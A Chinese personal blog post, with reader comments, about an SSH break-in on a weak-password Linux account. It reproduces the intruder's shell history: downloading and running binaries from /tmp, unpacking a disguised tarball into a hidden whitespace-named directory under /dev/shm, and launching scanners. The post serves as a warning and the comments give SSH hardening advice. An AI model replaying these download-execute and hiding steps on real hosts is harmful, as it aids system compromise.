Categories
computer Internet Linux

亲身经历了一次Hack攻击

刚才突然发现网络出现异常(出现一些异常的流量),遂调用who命令突然发现iraf用户被人通过ssh登录……都怪我一时疏忽大意,居然给iraf 设置了一个那么简单的密码,而且还开了ssh。结果突然就发现了一个95.77.21.239的IP登录了。我一下子意识到,自己是被黑客攻击了。接着我查了ip归属地,居然是罗马尼亚……肯定只是个幌子。根据和某个高手朋友的结果,鉴定出好在这个黑客不是个高手……如果是的话,我的电脑早就要重装了。然后我查看了一下shell的history发现了如下的操作历史

wget
cd /tmp
chmod +x *
./bash
uname -a
 
wget
tar
cat /etc/issue
cd /dev/shm
mkdir "  "
cd "  "
wget ***; tar zxvf fb.jpg ; rm -rf fb.jpg ; cd fb ; chmod 777 * ; (为了安全起见,我没有贴出链接)
./0-100 196
./100-200 196
cd /dev/shm
w
cd "  "
ls -a
cd fb
ls -a
cat log*
./100-200 196
ls -a
cat log*
./0-100 213
cd fb
cd /dev/shm
ls
cat /proc/cpuinfo
cd /dev/shm
./0-100 213
cd fb

之后我的iraf用户就出现了无数个ftp_scanner命令……幸好我及时发现……然后把他干的好事逆操作一遍……接着杀掉了所有iraf的进程,删除了iraf用户……目前可能没问题了,前提是如果他的操作只停留在shell层面。在这里提醒大家一定要注意linux用户的密码管理,不能疏忽大意。我的个人案例供警示。

10 replies on “亲身经历了一次Hack攻击”

francis <img width="16" height="16" src="https://eagle.lamost.org/wp-content/plugins/advanced-user-agent-displayer/img/24/net/firefox.png" alt="Firefox 5.0" title="Firefox 5.0"> <img width="16" height="16" src="https://eagle.lamost.org/wp-content/plugins/advanced-user-agent-displayer/img/24/os/windows-7.png" alt="Windows 7" title="Windows 7 ">says:

Linux也被Hack提权了?太恐怖了吧……

禁用密码认证改用密钥对, 将端口移到非标准的, 同时使用群组进行用户白名单控制, 最后用denyhosts监视闯入者, 做了这4条SSH的安全问题可以降到最低.

Yuan <img width="16" height="16" src="https://eagle.lamost.org/wp-content/plugins/advanced-user-agent-displayer/img/24/net/safari.png" alt="Safari " title="Safari "> <img width="16" height="16" src="https://eagle.lamost.org/wp-content/plugins/advanced-user-agent-displayer/img/24/os/macintosh.png" alt="MacIntosh " title="MacIntosh ">says:

能不能稍微具体点说一下这四个怎么具体操作?

Marvin <img width="16" height="16" src="https://eagle.lamost.org/wp-content/plugins/advanced-user-agent-displayer/img/24/net/chrome.png" alt="Chrome 19.0.1049.3" title="Chrome 19.0.1049.3"> <img width="16" height="16" src="https://eagle.lamost.org/wp-content/plugins/advanced-user-agent-displayer/img/24/os/windows-7.png" alt="Windows 7" title="Windows 7 ">says:

啊,如果那个记录是伪造的呢……

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.